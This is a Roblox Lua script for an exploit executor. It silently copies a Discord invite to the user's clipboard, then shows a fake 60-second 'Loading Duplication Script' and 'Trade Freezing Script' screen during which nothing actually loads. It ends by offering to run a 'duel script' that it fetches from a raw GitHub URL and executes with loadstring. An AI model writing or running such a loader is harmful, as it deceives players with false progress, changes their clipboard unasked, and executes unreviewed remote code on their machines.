local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local player = Players.LocalPlayer

pcall(function()
if setclipboard then
setclipboard("https://discord.gg/TwyvK8JU7m")
end
end)

local gui = Instance.new("ScreenGui")
gui.Name = "VoidLoader"
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false
gui.Parent = player:WaitForChild("PlayerGui")

local bg = Instance.new("Frame")
bg.Size = UDim2.new(1,0,1,0)
bg.BackgroundColor3 = Color3.fromRGB(5,5,5)
bg.BorderSizePixel = 0
bg.Parent = gui

local percent = Instance.new("TextLabel")
percent.AnchorPoint = Vector2.new(0.5,0.5)
percent.Position = UDim2.new(0.5,0,0.36,0)
percent.Size = UDim2.new(0,200,0,40)
percent.BackgroundTransparency = 1
percent.Text = "0%"
percent.Font = Enum.Font.GothamBold
percent.TextSize = 28
percent.TextColor3 = Color3.fromRGB(220,220,220)
percent.Parent = bg

local timer = Instance.new("TextLabel")
timer.AnchorPoint = Vector2.new(0.5,0.5)
timer.Position = UDim2.new(0.5,0,0.42,0)
timer.Size = UDim2.new(0,200,0,40)
timer.BackgroundTransparency = 1
timer.Text = "01:00"
timer.Font = Enum.Font.GothamBold
timer.TextSize = 34
timer.TextColor3 = Color3.fromRGB(255,255,255)
timer.Parent = bg

local title = Instance.new("TextLabel")
title.AnchorPoint = Vector2.new(0.5,0.5)
title.Position = UDim2.new(0.5,0,0.50,0)
title.Size = UDim2.new(0.8,0,0,60)
title.BackgroundTransparency = 1
title.Text = "Loading Duplication Script..."
title.Font = Enum.Font.GothamBold
title.TextScaled = true
title.TextColor3 = Color3.fromRGB(255,255,255)
title.Parent = bg

local barBG = Instance.new("Frame")
barBG.AnchorPoint = Vector2.new(0.5,0.5)
barBG.Position = UDim2.new(0.5,0,0.58,0)
barBG.Size = UDim2.new(0.5,0,0,20)
barBG.BackgroundColor3 = Color3.fromRGB(30,30,30)
barBG.BorderSizePixel = 0
barBG.Parent = bg

local barCorner = Instance.new("UICorner")
barCorner.CornerRadius = UDim.new(0,10)
barCorner.Parent = barBG

local bar = Instance.new("Frame")
bar.Size = UDim2.new(0,0,1,0)
bar.BackgroundColor3 = Color3.fromRGB(170,0,255)
bar.BorderSizePixel = 0
bar.Parent = barBG

local fillCorner = Instance.new("UICorner")
fillCorner.CornerRadius = UDim.new(0,10)
fillCorner.Parent = bar

local credit = Instance.new("TextLabel")
credit.AnchorPoint = Vector2.new(0.5,1)
credit.Position = UDim2.new(0.5,0,0.96,0)
credit.Size = UDim2.new(0,300,0,40)
credit.BackgroundTransparency = 1
credit.Text = "By void"
credit.Font = Enum.Font.GothamBold
credit.TextSize = 20
credit.TextColor3 = Color3.fromRGB(200,200,200)
credit.Parent = bg

local duration = 60
local startTime = tick()

while true do
local elapsed = tick() - startTime
local progress = math.clamp(elapsed / duration,0,1)

bar.Size = UDim2.new(progress,0,1,0)
percent.Text = math.floor(progress*100).."%"

local remaining = math.max(0,duration - elapsed)
local m = math.floor(remaining/60)
local s = math.floor(remaining%60)
timer.Text = string.format("%02d:%02d",m,s)

if progress > 0.33 and progress < 0.66 then
title.Text = "Loading Trade Freezing Script..."
elseif progress >= 0.66 then
title.Text = "Loading..."
end

if progress >= 1 then
break
end

task.wait()
end

percent.Text = "100%"
timer.Text = "00:00"

for _,v in pairs(bg:GetDescendants()) do
if v:IsA("TextLabel") then
TweenService:Create(v,TweenInfo.new(1),{TextTransparency=1}):Play()
elseif v:IsA("Frame") then
TweenService:Create(v,TweenInfo.new(1),{BackgroundTransparency=1}):Play()
end
end

task.wait(1)
gui:Destroy()

local promptGui = Instance.new("ScreenGui")
promptGui.Parent = player:WaitForChild("PlayerGui")

local frame = Instance.new("Frame")
frame.Size = UDim2.new(0,260,0,140)
frame.Position = UDim2.new(0.5,-130,0.5,-70)
frame.BackgroundColor3 = Color3.fromRGB(15,15,20)
frame.Parent = promptGui

local c = Instance.new("UICorner")
c.CornerRadius = UDim.new(0,10)
c.Parent = frame

local text = Instance.new("TextLabel")
text.Size = UDim2.new(1,0,0,60)
text.Position = UDim2.new(0,0,0,10)
text.BackgroundTransparency = 1
text.Text = "Do you want to execute the duel script?"
text.Font = Enum.Font.GothamBold
text.TextScaled = true
text.TextColor3 = Color3.new(1,1,1)
text.Parent = frame

local yes = Instance.new("TextButton")
yes.Size = UDim2.new(0.4,0,0,35)
yes.Position = UDim2.new(0.08,0,0.65,0)
yes.Text = "Yes"
yes.Font = Enum.Font.GothamBold
yes.TextColor3 = Color3.new(1,1,1)
yes.BackgroundColor3 = Color3.fromRGB(0,170,255)
yes.Parent = frame

local yc = Instance.new("UICorner")
yc.Parent = yes

local no = Instance.new("TextButton")
no.Size = UDim2.new(0.4,0,0,35)
no.Position = UDim2.new(0.52,0,0.65,0)
no.Text = "No"
no.Font = Enum.Font.GothamBold
no.TextColor3 = Color3.new(1,1,1)
no.BackgroundColor3 = Color3.fromRGB(60,60,70)
no.Parent = frame

local nc = Instance.new("UICorner")
nc.Parent = no

yes.MouseButton1Click:Connect(function()
promptGui:Destroy()
loadstring(game:HttpGet("https://raw.githubusercontent.com/VoidScriptzz/Duelsscript/refs/heads/main/Duelz"))()
end)

no.MouseButton1Click:Connect(function()
promptGui:Destroy()
end)
